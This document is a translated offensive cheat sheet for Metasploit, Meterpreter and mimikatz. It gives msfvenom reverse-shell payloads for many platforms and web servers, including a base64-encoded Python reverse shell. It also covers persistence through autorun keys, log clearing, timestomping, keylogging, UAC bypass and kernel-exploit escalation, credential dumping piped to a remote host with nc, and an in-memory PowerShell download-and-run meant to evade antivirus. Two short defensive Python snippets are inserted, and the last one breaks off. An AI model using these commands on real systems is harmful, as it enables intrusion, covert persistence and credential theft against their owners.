Preface

Notes on some ways of using the Metasploit Framework.

I. MSF

Common msfvenom options:

-p, --payload    <payload>       Specify the payload to use
-l, --list       [module_type]   List all available resources of the given module type; types: payloads, encoders, nops, all
-n, --nopsled    <length>        Prepend a NOP sled of the given length to the payload
-f, --format     <format>        Output format (use --help-formats to list the formats msf supports)
-e, --encoder    [encoder]       Specify the encoder to use
-a, --arch       <architecture>  Target architecture of the payload
    --platform   <platform>      Target platform of the payload
-s, --space      <length>        Maximum size of the resulting payload
-b, --bad-chars  <list>          Characters to avoid, e.g. '\x00\xff'
-i, --iterations <count>         Number of times to encode the payload
-c, --add-code   <path>          Specify an additional win32 shellcode file to include
-x, --template   <path>          Specify a custom executable file to use as a template
-k, --keep                       Preserve the template program's behaviour and run the injected payload as a new process
    --payload-options            List the payload's standard options
-o, --out   <path>               Save the payload to a file
-v, --var-name <name>            Specify a custom variable name to use for certain output formats
    --smallest                   Generate the smallest possible payload
-h, --help                       Show help
    --help-formats               List the output formats msf supports

1. The Tomcat password brute-force module

use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run

Note: by default, Tomcat locks an account after 5 failed login attempts.
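From the defender's side, the same brute-force run shows up in Tomcat's access log as a burst of 401 responses for the Manager app from one source. The following is an added example, not code from the original post: it parses constructed common-log-format lines and flags any source with at least 5 failed Manager logins inside a 5-minute window (the /manager path, the 401 status and the threshold of 5 mirror the note above and are assumptions of this example).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Tomcat access-log lines (common log format). The
# first source sends five requests to the Manager app that all get 401,
# which is how a Basic-auth dictionary attack looks from the server side.
SAMPLE_LOG = """\
192.168.2.10 - - [12/Jun/2019:06:31:11 -0700] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [12/Jun/2019:06:31:12 -0700] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [12/Jun/2019:06:31:12 -0700] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [12/Jun/2019:06:31:13 -0700] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [12/Jun/2019:06:31:13 -0700] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.55 - admin [12/Jun/2019:06:40:00 -0700] "GET /manager/html HTTP/1.1" 200 19854
192.168.2.77 - - [12/Jun/2019:07:02:30 -0700] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.77 - - [12/Jun/2019:07:30:00 -0700] "GET /index.jsp HTTP/1.1" 200 1120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_manager_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: max_failures_in_window} for every source that produced at
    least `threshold` 401 responses on the Manager app within `window`.
    The default threshold matches the lockout count noted above."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith("/manager") and rec["status"] == 401:
            failures[rec["ip"]].append(rec["ts"])

    hits = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits


if __name__ == "__main__":
    for ip, count in find_manager_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failed Manager logins within 5 minutes")
```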

2. Setting up a Windows reverse shell

1. Generate the Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST is the public IP
//LPORT is the callback port
//4433.exe is the generated file
2. Set up the listener IP and port
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run
3. The shell calls back
meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\padt002

3. Setting up a Linux reverse shell with msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST is the public IP
//LPORT is the callback port
//payload.elf is the generated file

4. Persistence with msf

Meterpreter's persistence script injects a Meterpreter agent so that Meterpreter keeps running after the system reboots.

  • In reverse-connection mode, the interval between connection attempts back to the attacker machine can be set
  • In bind mode, the port to bind and open at a given time can be set.

We run the persistence script so that it starts automatically at boot; the command is:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//Start Meterpreter at boot (-X), reconnect every 10 seconds (-i 10), use port 6666 (-p 6666), connect back to 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.71.112 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions -i

Active sessions
===============

Id  Type                   Information                                      Connection
--  ----                   -----------                                      ----------
2   meterpreter x86/win32  WUST-3E75F1D708\Administrator @ WUST-3E75F1D708  192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >

The autorun script is under C:\Documents and Settings\Administrator\Local Settings\Temp\
Once persistence is installed, the session can be reopened directly from msf next time:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800

5. Executables

Linux

Reverse connection:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Bind connection:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

How to run: just copy the executable to the target machine and execute it.

6. Web payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

How to run: put shell.php in the web directory and visit it with a browser, or run it with the following command:

php shell.php

7. Scripting-language shells

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

How to run: copy the contents of shell.py and run it on the Linux command line:

python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

8. Shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

If you want to evade AV, you still need to work with shellcode.

II. mimikatz

1. Obtaining passwords

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

Rid  : 500
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   :
NTLM :

Rid  : 1000
User : chenglee
LM   :
NTLM : 8d0f8e1a18236379538411a9056799f5

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }

2. Non-interactive password capture

# 1. Export to shash.txt
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit >> shash.txt
# 2. Send straight to a VPS, leaving no trace on the local disk
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit | nc 192.168.2.134 4444

3. wdigest

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

4. tspkg

meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

5. AV evasion methods

# 1. Use PowerShell to download the script and run it in memory
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
# 2. Procdump + Mimikatz
# procdump download: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
# First dump the process
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Then extract from the dump locally
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

III. Basic Meterpreter commands

1. System commands

Basic system commands

sessions
//sessions -h for help
sessions -l
//list current sessions
sessions -i <ID>
//interact with a session
sessions -k
//kill a session
background
//send the current session to the background
run
//run an existing module; type run and press tab twice to list the available scripts
info
//show information about a module
getuid
//show current privileges
getpid
//get the PID of the current process
sysinfo
//show the target's system information
ps
//list running processes
kill <PID>
//kill a process
idletime
//show how long the target has been idle
reboot
shutdown
//reboot / shut down
shell
//drop into the target's cmd shell

execute: running a file

execute
//run a file on the target
execute -H -i -f cmd.exe
//create a new cmd.exe process; -H hidden, -i interactive

clearev: clearing logs

clearev  #clear the Windows application, system and security logs

2. File system commands

Basic file system commands

getwd
pwd
//show the current working directory
ls
//list the current directory
cd
//change directory
search -f *pass*
//search for files; -h for help
cat c:\\lltest\\lltestpasswd.txt
//show file contents
upload /tmp/hack.txt C:\\lltest
//upload a file to the target
download c:\\lltest\\lltestpasswd.txt /tmp/
//download a file to the local machine
edit c:\\1.txt
//edit or create a file; if it does not exist it is created
rm C:\\lltest\\hack.txt
//delete a file
mkdir lltest2
//can only create a folder in the current directory
rmdir lltest2
//can only remove a folder in the current directory
getlwd
lpwd
//on the attacker's machine: show the current directory
lcd /tmp
//on the attacker's machine: change directory

timestomp: forging timestamps

timestomp C:// -h
//show help
timestomp -v C://2.txt
//show timestamps
timestomp C://2.txt -f C://1.txt
//copy 1.txt's timestamps to 2.txt

3. Network commands

# Basics
ipconfig/ifconfig
netstat -ano
arp
getproxy   #show proxy information
route   #show routes
# portfwd port forwarding
portfwd add -l 6666 -p 3389 -r 127.0.0.1 # forward the target's port 3389 to local port 6666
rdesktop -u Administrator -p ichunqiu 127.0.0.1:6666 # then connect with rdesktop; -u username, -p password
# autoroute: adding routes
run autoroute -h #show help
run autoroute -s 192.168.2.0/24  #add a route into the target's network
run autoroute -p  #show the added routes
# arp_scanner, portscan and similar modules can then be used to scan
run arp_scanner -r 192.168.2.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0
# Once autoroute has added the route, msf's built-in modules can also provide a socks proxy
# msf provides 3 modules for socks proxying:
# auxiliary/server/socks4a
# auxiliary/server/socks5
# auxiliary/server/socks_unc
# First background the session, then:
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 1080
run
# Then vi /etc/proxychains.conf  #add: socks4 127.0.0.1 1080
# Finally, use proxychains to go through the socks4a proxy
# sniffer: packet capture
use sniffer
sniffer_interfaces   #list interfaces
sniffer_start 2   #pick an interface and start capturing
sniffer_stats 2   #show status
sniffer_dump 2 /tmp/lltest.pcap  #write the capture to a pcap
sniffer_stop 2   #stop capturing

4. Privilege escalation

(1)getsystem

getsystem

How getsystem works:

  • getsystem creates a new Windows service, set to run as SYSTEM, which connects to a named pipe when it starts.
  • getsystem spawns a process that creates the named pipe and waits for a connection from the service.
  • The Windows service starts, which establishes a connection to the named pipe.
  • The process accepts the connection and calls ImpersonateNamedPipeClient, creating an impersonation token for the SYSTEM user.
  • cmd.exe is then spawned with the newly obtained SYSTEM impersonation token, and we have a SYSTEM-privileged process.

(2)bypassuac

User Account Control (UAC) is a security mechanism Microsoft introduced in Windows Vista and later that helps prevent unauthorized changes to the system. Applications and tasks always run in the security context of a non-administrator account unless an administrator specifically grants administrator-level access. UAC can block unauthorized applications from installing automatically and prevent inadvertent changes to system settings.

msf provides the following modules for bypassing UAC:

msf5 auxiliary(server/socks5) > search bypassuac

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/local/bypassuac                   2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2  exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   3  exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   4  exploit/windows/local/bypassuac_injection         2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   5  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   6  exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   7  exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

They are used in the same way: after running, a new session is returned, in which getsystem has to be run again to obtain SYSTEM privileges

# Example
meterpreter > getuid
Server username: SAUCERMAN\TideSec
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) >  use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/bypassuac) > run
[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (206403 bytes) to 192.168.81.154
[*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
# A new meterpreter session should then come back, and running getsystem in it should have escalated privileges
# but here it failed

(3) Privilege escalation through kernel vulnerabilities

Both Linux and Windows have had many high-severity vulnerabilities that can be used for privilege escalation, for example ms13-081, ms15-051, ms16-032 and ms17-010 on Windows; msf also ships exploit modules for them.

meterpreter > run post/windows/gather/enum_patches  #list patch information
msf5 > use exploit/windows/local/ms13_053_schlamperei
msf5 > set SESSION 2
msf5 > exploit
# Example
meterpreter > run post/windows/gather/enum_patches
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/local/bypassuac) > search MS13-081

Matching Modules
================

   #  Name                                             Disclosure Date  Rank     Check  Description
   -  ----                                             ---------------  ----     -----  -----------
   0  exploit/windows/local/ms13_081_track_popup_menu  2013-10-08       average  Yes    Windows TrackPopupMenuEx Win32k NULL Page

msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
session => 4
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit
[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
# but it failed; oh well

5. Remote desktop & screenshots

enumdesktops
//list the available desktops
getdesktop
//get the desktop meterpreter is currently attached to
set_desktop
//set the desktop meterpreter is attached to; -h for help
screenshot
//take a screenshot
use espia
//or load the espia extension and then run screengrab
run vnc
//connect via VNC remote desktop

The getgui command

run getgui -h
//show help
run getgui -e
//enable remote desktop
run getgui -u lltest2 -p 123456
//add a user
run getgui -f 6661 -e
//forward port 3389 to 6661

getgui is not recommended by the framework; run post/windows/manage/enable_rdp is recommended instead
When getgui adds a user, the user is sometimes created successfully but does not have permission to log in through remote desktop

The enable_rdp script

run post/windows/manage/enable_rdp
//enable remote desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//forward port 3389 to 6662

The script is located at /usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
Reading enable_rdp.rb shows that: RDP is enabled by modifying the registry with reg; the user is added by calling cmd.exe and net user; the port forwarding uses the portfwd command

6. Keylogging

keyscan_start
//start keylogging
keyscan_dump
//dump the recorded keystrokes
keyscan_stop
//stop keylogging

7. Information gathering

# The information-gathering scripts live under:
# modules/post/windows/gather
# modules/post/linux/gather
# Some commonly used ones:
run post/windows/gather/checkvm #is the target a VM
run post/linux/gather/checkvm #is the target a VM
run post/windows/gather/forensics/enum_drives #list partitions
run post/windows/gather/enum_applications #installed software
run post/windows/gather/dumplinks   #recent file activity
run post/windows/gather/enum_ie  #IE cache
run post/windows/gather/enum_chrome   #Chrome cache
run post/windows/gather/enum_patches  #patch information
run post/windows/gather/enum_domain  #find the domain controller

8. Hash exploitation: obtaining hashes

run post/windows/gather/smart_hashdump
//dump password hashes from the SAM; requires SYSTEM privileges

9. Obtaining credentials

In an intranet, one administrator may manage several servers, and the passwords they use may be identical or follow a pattern. If we obtain a password or hash and then try logging in to other servers on the intranet, the results can be surprisingly good.

(1) Using mimikatz

load mimikatz    #help mimikatz for help
wdigest  #get Wdigest passwords
mimikatz_command -f samdump::hashes  #run a raw mimikatz command
mimikatz_command -f sekurlsa::searchPasswords
# Example
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     SAUCERMAN$
0;48748   NTLM
0;999     NTLM       WORKGROUP     SAUCERMAN$
0;476238  NTLM       SAUCERMAN     TideSec        123456
0;476209  NTLM       SAUCERMAN     TideSec        123456

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : saucerman
BootKey    : 691cff33caf49e933be97fcee370256a
RegOpenKeyEx SAM : (0x00000005)
Erreur lors de l'exploration du registre
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { TideSec ; SAUCERMAN ; 123456 }
[1] { TideSec ; SAUCERMAN ; 123456 }
[2] { SAUCERMAN ; TideSec ; 123456 }
[3] { SAUCERMAN ; TideSec ; 123456 }
[4] { TideSec ; SAUCERMAN ; 123456 }
[5] { TideSec ; SAUCERMAN ; 123456 }

(2) Using meterpreter's run hashdump command

meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...

TideSec:"123456"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

(3) post/windows/gather/smart_hashdump

As the warning above shows, the framework recommends post/windows/gather/smart_hashdump

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against SAUCERMAN
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/ubuntu/.msf4/loot/20190612084715_default_192.168.81.154_windows.hashes_439550.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     TideSec:"123456"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
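The user:RID:LM:NTLM::: lines that hashdump and smart_hashdump write can be audited directly. The following is an added example, not code from the original post: it parses that format and reports blank passwords (an NT hash equal to the well-known empty-string hash, which is exactly what the Administrator line above shows), accounts that still store an LM hash, and NT hashes shared by several accounts, the password-reuse case mentioned at the start of this section. The sample dump is constructed, and the non-empty hash values in it are made up.

```python
import re

# Hashes of the empty string under the LM and NT schemes (well-known
# constants; an NT hash equal to EMPTY_NT means the password is blank,
# an LM hash equal to EMPTY_LM means no LM hash is stored).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the pwdump/John format (user:rid:lm:ntlm:::) that
# hashdump and smart_hashdump produce; the non-empty hashes are made up.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
bob:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
this line is not a hash record
"""

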